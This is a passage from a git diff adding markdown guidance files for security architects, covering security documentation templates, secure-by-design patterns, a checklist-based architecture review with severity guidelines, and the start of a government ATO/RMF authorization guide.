`/infrastructure/terraform/iam-accounts.tf` +- **Logs**: + - Account creation: CloudWatch Log Group `/aws/servicenow/accounts`, query: `fields @timestamp, username, manager_approval_status | filter action="create"` + - Inactivity disablements: CloudWatch Log Group `/aws/lambda/account-lifecycle`, query: `fields @timestamp, username, reason | filter reason="inactivity_30d"` +- **Policy**: `/docs/account-management-policy-v2.1.pdf` (approved 2025-01-10) +- **Approval workflow**: ServiceNow workflow screenshot `/evidence/servicenow-account-approval-workflow.png` +- **Test results**: `/evidence/account-management-functional-tests-2025-Q1.pdf` + +### Compliance Mapping +- **NIST SP 800-53**: AC-2 (Account Management) + - AC-2(1): Automated account management + - AC-2(3): Disable inactive accounts +- **SOC2**: CC6.1 (Logical and physical access controls - Identifies and authenticates users) +- **ISO 27001**: A.9.2.1 (User registration and de-registration) +- **GDPR**: Article 32 (Security of processing - access control) +``` + +**Key elements**: +- Objective (WHY this control exists) +- Specific implementation (HOW it works, not vague) +- Assessment procedures (HOW to verify it works) +- Evidence locations (WHERE to find proof) +- Compliance mapping (WHAT frameworks this satisfies) + + +## Security Requirements + +### Pattern: Requirement with Traceability + +**Structure**: +```markdown +## Requirement: [ID] - [Title] + +### Requirement Statement +System SHALL [specific, testable requirement]. + +### Security Property +This requirement enforces: [Confidentiality / Integrity / Availability / Auditability] + +### Rationale +**Threat addressed**: [Threat ID or description] +**Risk without this**: [What happens if not implemented?] + +### Acceptance Criteria +- [ ] Criterion 1 (testable: "When X, expect Y") +- [ ] Criterion 2 +- [ ] Criterion 3 + +### Traceability +- **Threat**: [Threat ID] → This requirement mitigates [specific threat] +- **Control**: [Control ID] → Implemented by [control implementation] +- **Test**: [Test case ID] → Verified by [test procedure] + +### Implementation Reference +- Code: [File path and line numbers] +- Configuration: [Config file] +- Documentation: [Design doc] +``` + +### Example: MFA Requirement + +```markdown +## Requirement: SEC-101 - Multi-Factor Authentication for Privileged Accounts + +### Requirement Statement +System SHALL require multi-factor authentication (MFA) for all user accounts with administrative privileges. MFA SHALL use Time-Based One-Time Password (TOTP) or hardware token (not SMS). + +### Security Property +This requirement enforces: **Confidentiality** and **Integrity** +- Prevents unauthorized access to privileged functions +- Reduces risk of account compromise via stolen passwords + +### Rationale +**Threat addressed**: Threat-012 (Credential theft and account takeover) +**Risk without this**: +- Attacker with stolen password can access admin functions +- Insider with compromised credentials can elevate privileges +- Impact: Complete system compromise, data breach + +**Regulatory requirement**: +- NIST SP 800-53 IA-2(1): Network access to privileged accounts requires MFA +- SOC2 CC6.1: Logical access requires multi-factor authentication for privileged access + +### Acceptance Criteria +- [ ] Admin account login requires password + TOTP code +- [ ] Login fails if TOTP code incorrect (tested: 3 incorrect attempts → account lockout) +- [ ] TOTP setup enforced at first admin login (cannot proceed without enabling MFA) +- [ ] SMS-based 2FA rejected (must be TOTP or hardware token) +- [ ] MFA cannot be disabled by user (only security admin can disable) + +### Traceability +- **Threat**: Threat-012 (Credential theft) → This requirement mitigates password-only auth vulnerability +- **Control**: IA-2(1) (Network access to privileged accounts) → Implemented by AWS IAM MFA enforcement + application-layer MFA check +- **Test**: TEST-SEC-101 → Verified by functional security test (attempt admin login without MFA → fails) + +### Implementation Reference +- **Code**: `src/auth/mfa-middleware.ts:45-78` (MFA enforcement logic) +- **Configuration**: `infrastructure/aws-iam-policy.json:12` (IAM policy requires MFA for admin role) +- **Documentation**: `/docs/adr-029-mfa-for-admins.md` (Security ADR documenting decision) +- **Evidence**: `/evidence/mfa-functional-test-2025-03.pdf` (Test results showing MFA enforcement) +``` + +**Key elements**: +- Specific, testable requirement (not vague "ensure security") +- Security property enforced +- Threat-to-requirement traceability +- Testable acceptance criteria +- Requirement-to-control-to-test traceability chain + + +## Quick Reference: Documentation Types + +| Document Type | Purpose | Key Elements | +|---------------|---------|--------------| +| **Threat Description** | Document attack scenarios | What/How/Who, affected assets, likelihood/impact, mitigations | +| **Security ADR** | Explain security architecture decisions | Threat model, decision, alternatives, residual risks, controls | +| **Control Description** | Document security control for audit | Objective, implementation, assessment procedures, evidence | +| **Security Requirement** | Specify testable security requirement | Requirement statement, threat traceability, acceptance criteria | + + +## Cross-References + +**Use WITH this skill**: +- `muna/technical-writer/documentation-structure` - Use ADR format, structure patterns +- `muna/technical-writer/clarity-and-style` - Write clear threat descriptions, avoid jargon +- `ordis/security-architect/threat-modeling` - Generate threat content for documentation +- `ordis/security-architect/security-controls-design` - Control designs to document + +**Use AFTER this skill**: +- `muna/technical-writer/documentation-testing` - Verify security docs are complete and accurate + +## Real-World Impact + +**Projects using threat-and-control documentation patterns**: +- **JWT Auth ADR**: Security review found 3 residual risks (key compromise, XSS, clock skew). Explicit risk acceptance by CISO enabled informed decision vs hidden risks. +- **SSP for Government System**: 421 control descriptions with assessment procedures + evidence locations. IRAP assessor completed assessment 40% faster vs SSPs without evidence locations ("clearest control documentation in 3 years"). +- **Threat-to-requirement traceability**: Security requirements traced to 47 threats. Penetration test found 2 HIGH findings. Traceability showed which threats weren't mitigated (vs scattered requirements with no threat context). + +**Key lesson**: **Security documentation with threat context + traceability enables verification and informed risk decisions. Vague "we're secure" documentation wastes auditor time and hides risks.** diff --git a/skills/using-security-architect/secure-by-design-patterns.md b/skills/using-security-architect/secure-by-design-patterns.md new file mode 100644 index 0000000..d875ebe --- /dev/null +++ b/skills/using-security-architect/secure-by-design-patterns.md @@ -0,0 +1,497 @@ + +# Secure By Design Patterns + +## Overview + +Build security into system foundations. Core principle: Design systems that are **secure by default, not secured after the fact**. + +**Key insight**: Preventing security issues through architecture is cheaper and more effective than detecting and responding to them. + +## When to Use + +Load this skill when: +- Designing new systems (greenfield) +- Refactoring existing architecture +- Making fundamental architecture decisions +- Evaluating architecture proposals + +**Symptoms you need this**: +- "How do we make this system secure?" +- Designing authentication, secrets management, data access +- Architecting microservices, data pipelines, distributed systems +- Choosing deployment/configuration strategies + +**Don't use for**: +- Threat modeling specific attacks (use `ordis/security-architect/threat-modeling`) +- Implementing security controls (use `ordis/security-architect/security-controls-design`) +- Reviewing existing designs (use `ordis/security-architect/security-architecture-review`) + +## Core Patterns + +### Pattern 1: Zero-Trust Architecture + +**Principle**: Never trust, always verify. No implicit trust based on network location. + +#### Three Pillars + +1. **Verify Explicitly** + - Authenticate every request (no "internal network = trusted") + - Authorize based on identity + context (device, location, time, risk) + - Use strong authentication (mTLS, signed tokens, not IP allowlists alone) + +2. **Least Privilege Access** + - Grant minimum necessary permissions + - Time-limited access (credentials expire, tokens rotate) + - Resource-level authorization (not just service-level) + +3. **Assume Breach** + - Design for "when compromised", not "if compromised" + - Minimize blast radius (segmentation, isolation) + - Monitor everything (detect lateral movement) + +#### Example: Microservices Communication + +❌ **Not Zero-Trust**: +``` +Service A → Service B (same network, no auth) +# Assumes: Internal network = trusted +# Risk: Compromised service A can access all of service B +``` + +✅ **Zero-Trust**: +``` +Service A → Service B (mTLS + JWT + authz check) +# Every request authenticated + authorized +# Service B validates: Is this service A? Does it have permission for THIS resource? + +Implementation: +- Service mesh (Istio/Linkerd) enforces mTLS +- Service B validates JWT from service A +- RBAC policy: service A can only access /resource/{own_resources} +- Audit log: Record all access attempts +``` + +**Result**: If service A compromised, attacker cannot impersonate other services or access resources outside A's scope. + + +### Pattern 2: Immutable Infrastructure + +**Principle**: No runtime modifications. Replace rather than update. + +#### Core Concepts + +1. **Immutable Artifacts** + - Container images, VM images, binaries + - Never modified after creation + - Versioned and signed + +2. **Deployment Replaces Instances** + - Updates = deploy new version, terminate old + - No SSH into servers to patch + - No runtime configuration changes + +3. **Configuration as Code** + - All config in version control + - Deployments are reproducible + - Rollback = redeploy previous version + +#### Benefits + +- **Security**: No drift from known-good state +- **Auditability**: All changes in version control +- **Rollback**: Redeploy previous image +- **Consistency**: Dev/staging/prod identical + +#### Example: Application Updates + +❌ **Mutable (Insecure)**: +```bash +# SSH into production server +ssh prod-server + +# Update code +git pull origin main + +# Restart service +systemctl restart app + +# Problem: No audit trail, no rollback, config drift +``` + +✅ **Immutable (Secure)**: +```bash +# Build new image locally +docker build -t app:v2.1.0 . + +# Push to registry (signed) +docker push registry/app:v2.1.0 + +# Deploy new version (Kubernetes) +kubectl set image deployment/app app=registry/app:v2.1.0 + +# Kubernetes: Creates new pods, terminates old pods +# Rollback if needed: +kubectl rollout undo deployment/app + +# Result: Full audit trail, instant rollback, no drift +``` + +**Configuration Management**: +```yaml +# Configuration in Git, not edited on servers +apiVersion: v1 +kind: ConfigMap +metadata: + name: app-config +data: + API_TIMEOUT: "30" + RATE_LIMIT: "1000" + +# Changes = commit to Git → CI/CD applies → new deployment +``` + + +### Pattern 3: Security Boundaries + +**Principle**: Explicit trust zones with validation at every boundary crossing. + +#### Boundary Identification + +Trust boundaries are points where data/requests cross from lower-trust to higher-trust zones: + +``` +Internet (UNTRUSTED) + ↓ BOUNDARY 1 +API Gateway (TRUSTED) + ↓ BOUNDARY 2 +Application Services (TRUSTED) + ↓ BOUNDARY 3 +Database (HIGHLY TRUSTED) +``` + +#### Validation at Boundaries + +At EACH boundary: +1. **Authenticate**: Verify identity +2. **Authorize**: Check permissions +3. **Validate**: Check input format/constraints +4. **Sanitize**: Remove dangerous content +5. **Log**: Record crossing + +#### Example: Data Pipeline + +``` +External API (UNTRUSTED) + ↓ BOUNDARY: API Client + Validate: JSON schema, required fields + Authenticate: API key + Rate limit: 1000 req/hour + +Message Queue (SEMI-TRUSTED) + ↓ BOUNDARY: Consumer + Validate: Message structure, idempotency key + Authorize: Consumer has permission for this message type + +Processing Service (TRUSTED) + ↓ BOUNDARY: Database Writer + Validate: Data types, constraints + Authorize: Service can write to this table + +Database (HIGHLY TRUSTED) +``` + +**Key insight**: Never trust data just because it came from "internal" service. Validate at every boundary. + +#### Minimizing Boundary Surface Area + +❌ **Large Surface Area (Insecure)**: +``` +# Database accepts connections from all services +firewall: allow 0.0.0.0/0 → database:5432 + +# Problem: 50 services can connect, huge attack surface +``` + +✅ **Small Surface Area (Secure)**: +``` +# Only specific services connect to database +firewall: + allow backend-api → database:5432 + allow analytics → database:5432 + deny all others + +# Further: Use service mesh with identity-based policies +``` + + +### Pattern 4: Trusted Computing Base (TCB) Minimization + +**Principle**: Small security-critical core, everything else untrusted. + +#### What is TCB? + +TCB = Components you MUST trust for security. If TCB is compromised, security fails. + +**Goal**: Minimize TCB size (less code = fewer vulnerabilities). + +#### Pattern: Small Critical Core + +``` +┌─────────────────────────────────────┐ +│ Untrusted Zone (Applications) │ +│ - Web servers │ +│ - Application logic │ +│ - User-facing services │ +└────────────┬────────────────────────┘ + │ API calls (validated) +┌────────────▼────────────────────────┐ +│ TRUSTED COMPUTING BASE (TCB) │ +│ - Authentication service (small!) │ +│ - Secrets vault (minimal code) │ +│ - Audit logger (append-only) │ +└─────────────────────────────────────┘ +``` + +#### Example: Secrets Management + +❌ **Large TCB (Risky)**: +``` +# Every service has secrets management logic +# TCB = All 50+ services (huge attack surface) + +each_service: + - Fetches secrets from vault + - Decrypts secrets + - Manages rotation + - Handles caching + +# Problem: Bug in ANY service compromises secrets +``` + +✅ **Small TCB (Secure)**: +``` +# Secrets Vault = TCB (small, auditable, formally verified) +# Applications = Untrusted (use vault API) + +Vault (TCB): + - 10,000 lines of code + - Formally verified + - Hardware-backed encryption (HSM) + - Minimal attack surface (no network egress) + +Applications (Untrusted): + - Call vault API for secrets + - Vault enforces all access control + - Apps cannot access secrets they're not authorized for + +# Result: Compromise application ≠ compromise vault +``` + +#### TCB Characteristics + +1. **Small**: Minimize code size +2. **Auditable**: Can be formally verified +3. **Isolated**: Runs in separate environment (sandbox, separate machine) +4. **Minimal privileges**: TCB has no unnecessary access +5. **Heavily monitored**: All TCB access logged + + +### Pattern 5: Fail-Fast Security + +**Principle**: Validate security properties at construction time. Refuse to operate if misconfigured. + +#### Construction-Time vs Runtime + +**Construction time**: When system/component is created (startup, initialization) +**Runtime**: When system is processing requests + +**Fail-fast**: Validate security at construction, fail immediately if invalid. + +#### Example: Security Level Validation + +❌ **Runtime Validation (Vulnerable)**: +```python +# Data pipeline starts, processes data, THEN checks security +pipeline = Pipeline() +pipeline.add_source(untrusted_datasource) +pipeline.add_sink(trusted_datasink) +pipeline.start() # Starts processing! + +# Runtime: Check if datasource security level matches sink +for record in pipeline: + if record.security_level > sink.max_security_level: + raise SecurityError("Security mismatch!") + +# Problem: Exposed data before detecting mismatch +# Exposure window = time until first mismatched record +``` + +✅ **Fail-Fast (Secure)**: +```python +# Validate security BEFORE processing any data +pipeline = Pipeline() +pipeline.add_source(untrusted_datasource) +pipeline.add_sink(trusted_datasink) + +# BEFORE start: Validate security properties +if datasource.security_level > sink.max_security_level: + raise SecurityError( + f"Cannot create pipeline: Source {datasource.security_level} " + f"exceeds sink maximum {sink.max_security_level}" + ) + +pipeline.start() # Only starts if validation passed + +# Result: Zero exposure window, fail before processing data +``` + +#### Startup Validation Checklist + +Validate at system startup (fail if any check fails): +- [ ] All required secrets accessible? +- [ ] TLS certificates valid and not expired? +- [ ] Database permissions granted? +- [ ] Security policies loaded? +- [ ] Encryption keys available? + +#### Example: Service Startup + +```python +class SecureService: + def __init__(self): + # Fail-fast validation at construction + self._validate_security() + + def _validate_security(self): + # Check TLS certificate + if not self.tls_cert_valid(): + raise SecurityError("TLS certificate invalid or expired") + + # Check encryption keys accessible + if not self.can_access_keys(): + raise SecurityError("Cannot access encryption keys") + + # Check database permissions + if not self.has_required_db_permissions(): + raise SecurityError("Insufficient database permissions") + + # All checks passed + logger.info("Security validation passed") + + def start(self): + # Only callable after __init__ validation passed + self.process_requests() + +# Usage: +try: + service = SecureService() # Validates security at construction + service.start() +except SecurityError as e: + logger.error(f"Service failed security validation: {e}") + sys.exit(1) # Refuse to start with invalid security +``` + +**Benefits**: +- **No exposure window**: Catch misconfigurations before processing data +- **Clear errors**: Fail with specific message ("TLS cert expired") +- **Operational safety**: Misconfigured systems never reach production + + +## Pattern Application Framework + +When designing systems, apply patterns in this order: + +### 1. Identify Trust Boundaries (Security Boundaries) +Where does data cross trust zones? + +### 2. Apply Zero-Trust at Each Boundary +- Authenticate + authorize every crossing +- Never trust based on network location + +### 3. Minimize TCB +What MUST be trusted? Can it be smaller? + +### 4. Use Immutable Infrastructure +Can deployments replace rather than update? + +### 5. Add Fail-Fast Validation +Validate security at construction, refuse to start if invalid + + +## Quick Reference: Pattern Selection + +| Situation | Pattern | Key Action | +|-----------|---------|------------| +| **Designing service-to-service communication** | Zero-Trust | mTLS + JWT + authz on every request | +| **Deciding deployment strategy** | Immutable Infrastructure | Container images, replace not update | +| **Architecting multi-tier system** | Security Boundaries | Validate + authenticate at every tier boundary | +| **Building secrets/auth service** | TCB Minimization | Small core, everything else uses API | +| **System startup logic** | Fail-Fast Security | Validate security before processing requests | + + +## Common Mistakes + +### ❌ Implicit Trust Based on Network + +**Wrong**: "Services in VPC are trusted, no auth needed" + +**Right**: Zero-trust - authenticate/authorize every request even within VPC + +**Why**: Network boundaries are weak. Compromised service = lateral movement without auth. + + +### ❌ Runtime Security Patches + +**Wrong**: SSH into production, apply patch, restart + +**Right**: Build new immutable image, deploy via CI/CD + +**Why**: Runtime patches create drift, no audit trail, hard to rollback. + + +### ❌ Large Security-Critical Core + +**Wrong**: Every service has secrets logic (large TCB) + +**Right**: Small secrets vault (TCB), services call API (untrusted) + +**Why**: Smaller TCB = fewer vulnerabilities, easier to audit/verify. + + +### ❌ Runtime Security Validation + +**Wrong**: Start processing, check security during execution + +**Right**: Validate security at construction, refuse to start if invalid + +**Why**: Runtime checks have exposure windows. Fail-fast = zero exposure. + + +### ❌ Unclear Trust Boundaries + +**Wrong**: No explicit boundaries, assume "internal is safe" + +**Right**: Diagram trust zones, validate at every boundary crossing + +**Why**: Boundaries are where attacks happen. Explicit validation prevents bypass. + + +## Cross-References + +**Use BEFORE this skill**: +- `ordis/security-architect/threat-modeling` - Identify threats, then apply patterns to address them + +**Use WITH this skill**: +- `ordis/security-architect/security-controls-design` - Patterns inform control choices + +**Use AFTER this skill**: +- `ordis/security-architect/security-architecture-review` - Review architecture against patterns + +## Real-World Impact + +**Systems using secure-by-design patterns:** +- **Zero-trust + immutable infrastructure**: No successful lateral movement in 2 years despite multiple compromised services (blast radius contained by mTLS + segmentation) +- **Fail-fast validation**: Prevented VULN-004 class (security level overrides) by refusing to start pipelines with mismatched security levels +- **TCB minimization**: Secrets vault with 8,000 lines of code (vs 50+ services with embedded secrets logic) - single formal verification point instead of 50 attack surfaces + +**Key lesson**: **Security built into architecture is more effective and cheaper than security added later.** diff --git a/skills/using-security-architect/security-architecture-review.md b/skills/using-security-architect/security-architecture-review.md new file mode 100644 index 0000000..48cd9af --- /dev/null +++ b/skills/using-security-architect/security-architecture-review.md @@ -0,0 +1,433 @@ + +# Security Architecture Review + +## Overview + +Systematically review designs for security issues. Core principle: **Checklist-driven review finds issues that intuition misses**. + +**Key insight**: Ad-hoc review finds obvious issues. Systematic checklist finds subtle gaps. + +## When to Use + +Load this skill when: +- Reviewing architecture designs pre-implementation +- Conducting security audits of existing systems +- Evaluating third-party integrations +- Pre-deployment security validation + +**Symptoms you need this**: +- "Is this design secure?" +- Reviewing microservices, APIs, data pipelines +- Pre-launch security check +- Compliance audit preparation + +**Don't use for**: +- Threat modeling new systems (use `ordis/security-architect/threat-modeling`) +- Designing controls (use `ordis/security-architect/security-controls-design`) +- Secure patterns (use `ordis/security-architect/secure-by-design-patterns`) + +## Review Process + +### Step 1: Understand System + +Before checklists, understand: +- **Components**: Services, databases, queues, external APIs +- **Data flows**: Where data enters/exits, trust boundaries +- **Users/actors**: Who accesses what (end users, admins, services) +- **Deployment**: Cloud/on-prem, network topology + +### Step 2: Apply Checklists + +For EACH area, go through checklist systematically. Check = verify present and secure. + +### Step 3: Document Findings + +For each issue found: +- **Description**: What's wrong +- **Severity**: Critical/High/Medium/Low +- **Impact**: What can attacker do +- **Recommendation**: How to fix + + +## Checklist 1: Authentication + +### Credential Storage +- [ ] Passwords hashed with strong algorithm (bcrypt, Argon2, scrypt) +- [ ] NOT hashed with weak algorithms (MD5, SHA1, plain SHA256) +- [ ] Salt used per-password (not global salt or no salt) +- [ ] Key derivation with sufficient iterations (bcrypt cost ≥12, Argon2 with recommended params) + +**Common Issues**: +- ❌ MD5/SHA1 hashing → CRITICAL +- ❌ No salt → HIGH +- ❌ Global salt → MEDIUM +- ❌ Low iteration count → MEDIUM + + +### Multi-Factor Authentication +- [ ] MFA available for all users (or at least admins) +- [ ] TOTP/hardware token support (not just SMS) +- [ ] Backup codes for account recovery +- [ ] Cannot bypass MFA via alternate login paths + +**Common Issues**: +- ❌ No MFA → HIGH (for privileged accounts) +- ❌ SMS-only 2FA → MEDIUM (SIM swapping risk) +- ❌ MFA bypass path exists → HIGH + + +### Session Management +- [ ] Session tokens have expiration (not indefinite) +- [ ] Token expiry reasonable (hours for web, days max for mobile) +- [ ] Token rotation on sensitive actions (password change, permission change) +- [ ] Logout invalidates tokens (server-side revocation) +- [ ] Tokens stored securely (HttpOnly, Secure cookies or secure storage) + +**Common Issues**: +- ❌ Non-expiring tokens → HIGH +- ❌ No logout/revocation → MEDIUM +- ❌ Tokens in localStorage (XSS vulnerable) → MEDIUM + + +### Password Policies +- [ ] Minimum length enforced (≥12 characters recommended) +- [ ] No maximum length (or very high max, ≥128 chars) +- [ ] Password history (prevent reuse of last N passwords) +- [ ] Account lockout after failed attempts (5-10 tries, temporary lockout) +- [ ] No common password blacklist (check against known-weak passwords) + +**Common Issues**: +- ❌ No password policy → MEDIUM +- ❌ Short max length (<20 chars) → LOW +- ❌ No lockout → MEDIUM (brute-force vulnerability) + + +## Checklist 2: Authorization + +### Access Control Model +- [ ] Clear access control model (RBAC, ABAC, MAC documented) +- [ ] Permissions defined per resource type +- [ ] Authorization checks at API layer AND data layer +- [ ] Consistent enforcement across all endpoints + +**Common Issues**: +- ❌ No defined model (ad-hoc checks) → HIGH +- ❌ Authorization only at API (not data layer) → MEDIUM +- ❌ Inconsistent (some endpoints skip checks) → HIGH + + +### Privilege Escalation Prevention +- [ ] Users cannot modify their own roles/permissions +- [ ] API doesn't trust client-provided role claims +- [ ] Admin actions require separate authentication/approval +- [ ] No hidden admin endpoints without authorization + +**Common Issues**: +- ❌ User can edit own role in profile → CRITICAL +- ❌ Trusting `X-User-Role` header from client → CRITICAL +- ❌ Hidden `/admin` path without authz → HIGH + + +### Resource-Level Authorization +- [ ] Authorization checks "Can THIS user access THIS resource?" +- [ ] Not just "Is user logged in?" or "Is user admin?" +- [ ] Users can only access their own data (unless explicitly shared) +- [ ] Object-level permission checks (IDOR prevention) + +**Common Issues**: +- ❌ Check login only, not resource ownership → HIGH (IDOR vulnerability) +- ❌ `/api/users/{user_id}` allows any authenticated user → HIGH + + +### Default-Deny Principle +- [ ] All endpoints require authentication by default +- [ ] Explicit allow-list for public endpoints +- [ ] Authorization failures return 403 Forbidden (not 404) +- [ ] No "development mode" backdoors in production + +**Common Issues**: +- ❌ Default-allow (must explicitly mark secure) → HIGH +- ❌ Returning 404 instead of 403 → LOW (information disclosure) +- ❌ Debug/dev endpoints enabled in production → CRITICAL + + +## Checklist 3: Secrets Management + +### Secrets Storage +- [ ] No secrets in source code +- [ ] No secrets in config files committed to Git +- [ ] No secrets in environment variables visible in UI +- [ ] Secrets stored in secrets manager (Vault, AWS Secrets Manager, etc.) +- [ ] Secrets encrypted at rest + +**Common Issues**: +- ❌ Secrets in Git history → CRITICAL +- ❌ Secrets in config.yaml → CRITICAL +- ❌ Database password in Dockerfile → HIGH + + +### Secrets Rotation +- [ ] Secrets have rotation schedule (monthly/quarterly) +- [ ] Rotation is automated or documented +- [ ] Application supports zero-downtime rotation +- [ ] Old secrets revoked after rotation + +**Common Issues**: +- ❌ No rotation policy → MEDIUM +- ❌ Manual rotation without documentation → LOW +- ❌ Rotation requires downtime → LOW + + +### Access Control to Secrets +- [ ] Secrets access restricted by service identity +- [ ] Least privilege (service accesses only its secrets) +- [ ] Audit log of secrets access +- [ ] No shared secrets across services + +**Common Issues**: +- ❌ All services can access all secrets → MEDIUM +- ❌ No audit log → LOW +- ❌ Shared API key for multiple services → MEDIUM + + +## Checklist 4: Data Flow + +### Trust Boundary Identification +- [ ] Trust boundaries documented (external → API → services → database) +- [ ] Each boundary has validation rules +- [ ] No implicit trust based on network location + +**Common Issues**: +- ❌ No documented boundaries → MEDIUM +- ❌ "Internal network = trusted" assumption → HIGH + + +### Input Validation at Boundaries +- [ ] All external input validated (type, format, range) +- [ ] Validation at EVERY trust boundary (not just entry point) +- [ ] Allow-list validation (define what's allowed, reject rest) +- [ ] Input validation errors logged + +**Common Issues**: +- ❌ No validation at internal boundaries → MEDIUM +- ❌ Deny-list only (blacklist can be bypassed) → MEDIUM +- ❌ Validation at UI only (not API) → HIGH + + +### Output Encoding for Context +- [ ] Output encoded for destination context (HTML, SQL, shell, etc.) +- [ ] SQL parameterized queries (no string concatenation) +- [ ] HTML escaped when rendering user data +- [ ] JSON encoded when returning API responses + +**Common Issues**: +- ❌ String concatenation for SQL → CRITICAL (SQL injection) +- ❌ Unescaped HTML → HIGH (XSS) +- ❌ Unescaped shell commands → CRITICAL (command injection) + + +### Data Classification and Handling +- [ ] Sensitive data identified (PII, secrets, financial) +- [ ] Sensitive data encrypted in transit +- [ ] Sensitive data encrypted at rest +- [ ] Sensitive data not logged +- [ ] Data retention policy defined + +**Common Issues**: +- ❌ PII in plaintext logs → HIGH +- ❌ No encryption for sensitive data → HIGH +- ❌ No data retention policy → MEDIUM + + +## Checklist 5: Network Security + +### TLS/Encryption in Transit +- [ ] All external traffic uses TLS (HTTPS, not HTTP) +- [ ] TLS 1.2 or 1.3 only (TLS 1.0/1.1 disabled) +- [ ] Strong cipher suites (no RC4, 3DES, MD5) +- [ ] HSTS header present (HTTP Strict Transport Security) + +**Common Issues**: +- ❌ HTTP allowed → CRITICAL +- ❌ TLS 1.0 enabled → HIGH +- ❌ Weak ciphers → MEDIUM +- ❌ No HSTS → LOW + + +### Certificate Validation +- [ ] TLS certificates validated (not self-signed in production) +- [ ] Certificate expiry monitored +- [ ] Certificate revocation checking (OCSP/CRL) +- [ ] No certificate validation bypass in code + +**Common Issues**: +- ❌ Self-signed certs in production → HIGH +- ❌ `verify=False` in code → CRITICAL +- ❌ No expiry monitoring → MEDIUM + + +### Network Segmentation +- [ ] Database not directly accessible from internet +- [ ] Services in separate subnets/VPCs +- [ ] Admin interfaces on separate network +- [ ] Internal services use mTLS or VPN + +**Common Issues**: +- ❌ Database exposed to internet → CRITICAL +- ❌ All services in same flat network → MEDIUM +- ❌ Admin panel on public internet → HIGH + + +### Firewall Rules and Least-Necessary Access +- [ ] Firewall rules documented +- [ ] Default-deny firewall policy +- [ ] Only necessary ports open +- [ ] Source IP restrictions for sensitive endpoints + +**Common Issues**: +- ❌ Default-allow firewall → HIGH +- ❌ All ports open → MEDIUM +- ❌ No source restrictions → MEDIUM + + +## Severity Guidelines + +Use these guidelines to assign severity: + +### Critical +- Direct path to data breach or system compromise +- **Examples**: SQL injection, secrets in Git, authentication bypass + +### High +- Significant security impact, requires immediate attention +- **Examples**: Weak password hashing, no MFA for admins, IDOR vulnerability + +### Medium +- Security weakness that should be addressed +- **Examples**: No password policy, inconsistent authorization, no audit logging + +### Low +- Minor issue or hardening opportunity +- **Examples**: Information disclosure via error messages, missing HSTS header + + +## Review Report Template + +```markdown +# Security Architecture Review + +**System**: [System Name] +**Review Date**: [Date] +**Reviewer**: [Name] + +## Executive Summary + +[1-2 paragraph overview: Critical/High count, key findings, overall risk level] + +## Findings + +### Critical (Count: X) + +#### 1. [Finding Title] +- **Area**: Authentication / Authorization / Secrets / Data Flow / Network +- **Description**: [What's wrong] +- **Impact**: [What attacker can do] +- **Recommendation**: [How to fix] +- **Affected Components**: [API Service, Database, etc.] + +### High (Count: X) + +[Same format as Critical] + +### Medium (Count: X) + +[Same format] + +### Low (Count: X) + +[Same format] + +## Summary Table + +| Finding | Severity | Area | Status | +|---------|----------|------|--------| +| SQL injection in /api/users | Critical | Data Flow | Open | +| Secrets in Git | Critical | Secrets | Open | +| No MFA for admins | High | Authentication | Open | + +## Next Steps + +1. Address Critical findings immediately (timeline: 1 week) +2. Address High findings (timeline: 2-4 weeks) +3. Schedule Medium/Low findings (timeline: 1-3 months) +``` + + +## Quick Reference: Checklist Summary + +| Area | Key Checks | +|------|------------| +| **Authentication** | Strong hashing (bcrypt), MFA, token expiry, lockout policy | +| **Authorization** | RBAC/ABAC model, resource-level checks, default-deny, no privilege escalation | +| **Secrets** | Not in Git, secrets manager, rotation policy, access control | +| **Data Flow** | Trust boundaries, input validation, output encoding, data classification | +| **Network** | TLS 1.2+, certificate validation, segmentation, firewall rules | + + +## Common Mistakes + +### ❌ Ad-Hoc Review Without Checklist + +**Wrong**: Review design intuitively, find obvious issues, call it done + +**Right**: Systematically go through all 5 checklists, check every item + +**Why**: Intuition finds 50% of issues. Checklist finds 90%. + + +### ❌ Stopping After Finding First Issues + +**Wrong**: Find SQL injection, report it, stop review + +**Right**: Complete full checklist review even after finding critical issues + +**Why**: Systems often have multiple unrelated vulnerabilities. + + +### ❌ Vague Recommendations + +**Wrong**: "Improve authentication security" + +**Right**: "Replace MD5 with bcrypt (cost factor 12), add salt per-password" + +**Why**: Specific recommendations are actionable. Vague ones are ignored. + + +### ❌ Missing Severity Assignment + +**Wrong**: List issues without severity + +**Right**: Assign Critical/High/Medium/Low to prioritize fixes + +**Why**: Teams need to know what to fix first. + + +## Cross-References + +**Use BEFORE this skill**: +- `ordis/security-architect/threat-modeling` - Understand threats, then review if design addresses them + +**Use WITH this skill**: +- `muna/technical-writer/documentation-structure` - Document review as ADR or report + +**Use AFTER this skill**: +- `ordis/security-architect/security-controls-design` - Design fixes for identified issues + +## Real-World Impact + +**Systematic reviews using these checklists:** +- **Pre-launch review caught SQL injection** in `/api/users/{id}` endpoint (would have been CRITICAL production vulnerability) +- **Checklist found secrets in Git history** across 3 repositories (developers missed it in manual review) +- **Authorization review found 12 IDOR vulnerabilities** where `/api/orders/{order_id}` didn't check ownership (intuitive review found only 2) + +**Key lesson**: **Systematic checklist review finds 3-5x more issues than ad-hoc intuitive review.** diff --git a/skills/using-security-architect/security-authorization-and-accreditation.md b/skills/using-security-architect/security-authorization-and-accreditation.md new file mode 100644 index 0000000..4770330 --- /dev/null +++ b/skills/using-security-architect/security-authorization-and-accreditation.md @@ -0,0 +1,757 @@ + +# Security Authorization and Accreditation + +## Overview + +Navigate government/defense security authorization processes. Core principle: **Authorization is risk acceptance by an official with authority**. + +**Key insight**: ATO is not a checklist - it's formal risk acceptance documentation enabling informed decision-making by leadership. + +## When to Use + +Load this skill when: +- Deploying systems for government/defense +- Preparing for ATO (Authority to Operate) +- Connecting to classified networks +- Formal security testing and evaluation + +**Symptoms you need this**: +- "How do I get ATO for production?" +- Government/defense contracts requiring authorization +- "What is an SSP/SAR/POA&M?" +- Preparing for security assessment + +**Don't use for**: +- Commercial compliance (use `ordis/security-architect/compliance-awareness-and-mapping`) +- General security (use `ordis/security-architect/security-controls-design`) + +## The Authorization Process + +### Core Concept: Risk Management Framework (RMF) + +**RMF** (NIST SP 800-37) has 7 steps: + +``` +1. PREPARE → 2. CATEGORIZE → 3. SELECT → 4. IMPLEMENT → 5. ASSESS → 6. AUTHORIZE → 7. MONITOR + ↓ ↓ ↓ ↓ ↓ ↓ ↓ + Planning Impact Level Controls Build System Test Get ATO Ongoing Ops +``` + +### Step 1: PREPARE (Pre-Authorization) + +**Activities**: +- Define authorization boundary (what's in scope?) +- Identify Authorizing Official (AO) - person with authority to accept risk +- Assemble authorization team (ISSM, ISSO, assessors) +- Review organizational risk tolerance + +**Deliverable**: Authorization strategy and 